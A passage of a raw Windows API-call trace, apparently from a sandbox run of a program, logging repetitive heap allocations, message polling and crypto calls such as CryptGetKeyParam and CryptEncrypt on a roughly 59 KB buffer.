dwFlags=0x0, lpMem=0x6bb628 | out: hHeap=0x650000) returned 1 [0076.014] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0076.014] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5f8 | out: hHeap=0x650000) returned 1 [0076.014] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b000 | out: hHeap=0x650000) returned 1 [0076.014] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0076.015] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b000 | out: hHeap=0x650000) returned 1 [0076.015] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5f8 | out: hHeap=0x650000) returned 1 [0076.015] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0076.015] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb648 | out: hHeap=0x650000) returned 1 [0076.015] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0076.015] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5f8 | out: hHeap=0x650000) returned 1 [0076.015] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b000 | out: hHeap=0x650000) returned 1 [0076.015] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5c8 | out: hHeap=0x650000) returned 1 [0076.015] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0076.015] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptGetKeyParam", cchWideChar=17, lpMultiByteStr=0x6f96c8, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptGetKeyParam", lpUsedDefaultChar=0x0) returned 17 [0076.015] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b000 | out: hHeap=0x650000) returned 1 [0076.015] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f96c8 | out: hHeap=0x650000) returned 1 [0076.015] GetProcAddress (hModule=0x77710000, lpProcName="CryptGetKeyParam") returned 0x777377cb [0076.015] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e030 | out: hHeap=0x650000) returned 1 [0076.015] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5c8 | out: hHeap=0x650000) returned 1 [0076.015] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5c8 | out: hHeap=0x650000) returned 1 [0076.015] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb5f8 | out: hHeap=0x650000) returned 1 [0076.015] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4b8 | out: hHeap=0x650000) returned 1 [0076.015] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb568 | out: hHeap=0x650000) returned 1 [0076.015] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb4c8 | out: hHeap=0x650000) returned 1 [0076.015] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68e030 | out: hHeap=0x650000) returned 1 [0076.015] CryptGetKeyParam (in: hKey=0x6b8af8, dwParam=0x7, pbData=0x6bb448, pdwDataLen=0x61dda8, dwFlags=0x0 | out: pbData=0x6bb448*=0x660e, pdwDataLen=0x61dda8*=0x4) returned 1 [0076.015] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4c8 [0076.015] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792238 [0076.015] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96c8 [0076.015] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b000 [0076.015] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a970 [0076.015] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e228 [0076.015] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb568 [0076.016] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e228 | out: hHeap=0x650000) returned 1 [0076.016] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb568 | out: hHeap=0x650000) returned 1 [0076.016] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a970 | out: hHeap=0x650000) returned 1 [0076.016] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a970 [0076.016] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e228 [0076.016] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e498 [0076.016] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb568 [0076.016] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e498 | out: hHeap=0x650000) returned 1 [0076.016] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb568 | out: hHeap=0x650000) returned 1 [0076.016] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e228 | out: hHeap=0x650000) returned 1 [0076.016] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e228 [0076.016] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e498 [0076.016] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e390 [0076.016] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb568 [0076.016] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e390 | out: hHeap=0x650000) returned 1 [0076.016] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb568 | out: hHeap=0x650000) returned 1 [0076.016] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e498 | out: hHeap=0x650000) returned 1 [0076.016] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e498 [0076.016] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e390 [0076.016] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1b0 [0076.016] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb568 [0076.016] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1b0 | out: hHeap=0x650000) returned 1 [0076.016] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb568 | out: hHeap=0x650000) returned 1 [0076.016] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e390 | out: hHeap=0x650000) returned 1 [0076.016] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e390 [0076.016] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1b0 [0076.016] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6d8 [0076.016] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb568 [0076.016] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6d8 | out: hHeap=0x650000) returned 1 [0076.016] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb568 | out: hHeap=0x650000) returned 1 [0076.016] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e1b0 | out: hHeap=0x650000) returned 1 [0076.016] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e1b0 [0076.016] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e6d8 [0076.017] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1b0 [0076.017] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb568 [0076.017] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b1b0 | out: hHeap=0x650000) returned 1 [0076.017] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb568 | out: hHeap=0x650000) returned 1 [0076.017] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e6d8 | out: hHeap=0x650000) returned 1 [0076.017] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb598 | out: hHeap=0x650000) returned 1 [0076.017] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb578 | out: hHeap=0x650000) returned 1 [0076.017] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb628 | out: hHeap=0x650000) returned 1 [0076.017] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0076.017] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb648 | out: hHeap=0x650000) returned 1 [0076.017] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc70 | out: hHeap=0x650000) returned 1 [0076.017] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e4f8 | out: hHeap=0x650000) returned 1 [0076.017] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0076.017] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e408 | out: hHeap=0x650000) returned 1 [0076.017] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76a688 | out: hHeap=0x650000) returned 1 [0076.017] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e168 | out: hHeap=0x650000) returned 1 [0076.017] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abc8 | out: hHeap=0x650000) returned 1 [0076.017] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e210 | out: hHeap=0x650000) returned 1 [0076.017] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e420 | out: hHeap=0x650000) returned 1 [0076.017] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e330 | out: hHeap=0x650000) returned 1 [0076.017] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e5b8 | out: hHeap=0x650000) returned 1 [0076.017] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76acd0 | out: hHeap=0x650000) returned 1 [0076.017] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ab50 | out: hHeap=0x650000) returned 1 [0076.017] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e588 | out: hHeap=0x650000) returned 1 [0076.017] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e000 | out: hHeap=0x650000) returned 1 [0076.017] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad60 | out: hHeap=0x650000) returned 1 [0076.017] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e2e8 | out: hHeap=0x650000) returned 1 [0076.017] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76abb0 | out: hHeap=0x650000) returned 1 [0076.017] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76b138 | out: hHeap=0x650000) returned 1 [0076.017] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df40 | out: hHeap=0x650000) returned 1 [0076.017] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e618 | out: hHeap=0x650000) returned 1 [0076.017] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad18 | out: hHeap=0x650000) returned 1 [0076.017] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af88 | out: hHeap=0x650000) returned 1 [0076.017] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x74b780 | out: hHeap=0x650000) returned 1 [0076.017] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb638 | out: hHeap=0x650000) returned 1 [0076.017] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0076.017] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb638 [0076.017] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a1f38 [0076.018] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3d8 [0076.018] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6a1f38 | out: hHeap=0x650000) returned 1 [0076.018] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0076.018] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3d8 [0076.018] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb648 [0076.018] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f9748 [0076.018] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb488 [0076.018] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0076.018] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb648 | out: hHeap=0x650000) returned 1 [0076.018] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0076.018] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0076.018] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb638 | out: hHeap=0x650000) returned 1 [0076.018] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8c38 [0076.018] PeekMessageW (in: lpMsg=0x61e3dc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e3dc) returned 0 [0076.018] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb638 [0076.018] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dc70 [0076.018] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76af88 [0076.018] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3d8 [0076.018] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x14) returned 0x6f9748 [0076.018] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x44) returned 0x76f0b0 [0076.018] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76ad18 [0076.018] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb648 [0076.018] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e618 [0076.018] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb488 [0076.018] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0076.018] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76df40 [0076.018] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3d8 [0076.018] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb3d8 | out: hHeap=0x650000) returned 1 [0076.018] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76e618 | out: hHeap=0x650000) returned 1 [0076.018] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb488 | out: hHeap=0x650000) returned 1 [0076.018] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76ad18 | out: hHeap=0x650000) returned 1 [0076.018] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6bb648 | out: hHeap=0x650000) returned 1 [0076.019] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76f0b0 | out: hHeap=0x650000) returned 1 [0076.019] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x6f9748 | out: hHeap=0x650000) returned 1 [0076.019] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76af88 | out: hHeap=0x650000) returned 1 [0076.019] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x76df40 | out: hHeap=0x650000) returned 1 [0076.019] HeapFree (in: hHeap=0x650000, dwFlags=0x0, lpMem=0x68dc70 | out: hHeap=0x650000) returned 1 [0076.019] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.019] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb518 [0076.019] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a1f38 [0076.019] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb458 [0076.019] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.019] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb518 [0076.019] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb458 [0076.019] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0076.019] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.019] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.019] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.019] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68de78 [0076.019] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b0d8 [0076.019] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb518 [0076.019] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.019] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3b8 [0076.019] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dea0 [0076.019] CharUpperBuffW (in: lpsz="_CRYPT_STARTUP", cchLength=0xe | out: lpsz="_CRYPT_STARTUP") returned 0xe [0076.019] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0076.019] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3b8 [0076.019] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5b8 [0076.019] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0076.019] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNT", cchLength=0x10 | out: lpsz="__CRYPT_REFCOUNT") returned 0x10 [0076.020] PeekMessageW (in: lpMsg=0x61e27c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e27c) returned 0 [0076.020] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5b8 [0076.020] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4d8 [0076.020] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0076.020] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0076.020] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb3b8 [0076.020] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0076.020] CharUpperBuffW (in: lpsz="__CRYPT_REFCOUNTINC", cchLength=0x13 | out: lpsz="__CRYPT_REFCOUNTINC") returned 0x13 [0076.020] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0076.020] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3b8 [0076.020] PeekMessageW (in: lpMsg=0x61e444, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e444) returned 0 [0076.020] PeekMessageW (in: lpMsg=0x61e69c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e69c) returned 0 [0076.020] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3b8 [0076.020] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.020] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x38) returned 0x6b8bf8 [0076.021] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.021] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3b8 [0076.021] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5b8 [0076.021] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0076.021] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.021] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.021] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb3b8 [0076.021] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dea0 [0076.021] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e390 [0076.021] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5b8 [0076.021] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4d8 [0076.021] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x30) returned 0x692e90 [0076.021] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0076.021] PeekMessageW (in: lpMsg=0x61e28c, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e28c) returned 0 [0076.021] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4d8 [0076.021] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb4c8 [0076.022] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0076.022] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1b0 [0076.022] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4c8 [0076.022] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb4d8 [0076.022] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e648 [0076.022] CryptEncrypt (in: hKey=0x6b8af8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x0*, pdwDataLen=0x61e2d8*=0xe811, dwBufLen=0x0 | out: pbData=0x0*, pdwDataLen=0x61e2d8*=0xe820) returned 1 [0076.022] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb398 [0076.022] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x214) returned 0x792238 [0076.022] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68df40 [0076.022] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76b1b0 [0076.022] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e648 [0076.022] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e150 [0076.022] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5c8 [0076.022] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.022] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb398 [0076.022] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20a) returned 0x6a1f38 [0076.022] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb5b8 [0076.023] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.023] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.023] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb398 [0076.023] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5b8 [0076.023] PeekMessageW (in: lpMsg=0x61e8f4, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x61e8f4) returned 0 [0076.023] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb398 [0076.023] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x20) returned 0x68dea0 [0076.023] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e4f8 [0076.023] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb5b8 [0076.023] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76a688 [0076.023] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb578 [0076.023] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96a8 [0076.023] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x8) returned 0x6bb628 [0076.024] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x18) returned 0x6f96c8 [0076.024] CharLowerBuffW (in: lpsz="byte[59425]", cchLength=0xb | out: lpsz="byte[59425]") returned 0xb [0076.024] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x24) returned 0x68b450 [0076.024] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x10) returned 0x76e408 [0076.024] RtlAllocateHeap (HeapHandle=0x650000, Flags=0x0, Size=0x4) returned 0x6bb578 [0076.024] RtlAllocateHeap 